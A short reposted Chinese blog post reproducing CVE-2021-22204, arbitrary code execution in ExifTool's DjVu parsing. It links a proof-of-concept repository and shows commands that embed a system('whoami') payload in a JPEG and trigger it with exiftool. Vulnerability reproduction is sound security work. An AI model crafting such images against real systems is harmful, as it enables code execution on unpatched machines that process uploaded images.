相關內容簡體繁體

CVE-2021-22204：ExifTool任意代碼執行

本文轉載自查看原文 2021-05-18 11:56 1184 CVE

CVE-2021-22204 ExifTool任意代碼執行

github poc下載

https://github.com/OneSecCyber/JPEG_RCE

ExifTool 7.44至12.23在DjVu模塊中存在一個錯誤，該錯誤允許在解析惡意圖像時執行任意代碼

meta-data為MIME Type : image/jpeg"即jpg圖片可以達成RCE

exiftool -config eval.config mojave.jpg -eval='system("whoami")'

exiftool mojave.jpg

可以看到成功執行了命令

免責聲明！

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 CVE-2021-21220 Chrome遠程代碼執行漏洞復現 XStream遠程代碼執行（CVE-2021-29505 ） CVE-2021-2109 Weblogic Server遠程代碼執行 CVE-2021-21220 Chrome遠程代碼執行漏洞復現 CVE-2021-2109 Weblogic Server遠程代碼執行文本編輯器Vim/Neovim任意代碼執行漏洞（CVE-2019-12735） Tomcat遠程任意代碼執行漏洞及其POC（CVE-2017-12617） php-fpm在nginx特定環境下的任意代碼執行漏洞（CVE-2019-11043） WebLogic 任意文件上傳遠程代碼執行漏洞（CVE-2018-2894）------->>>任意文件上傳檢測POC PbootCMS任意代碼執行

粵ICP備18138465號 © 2018-2025 CODEPRJ.COM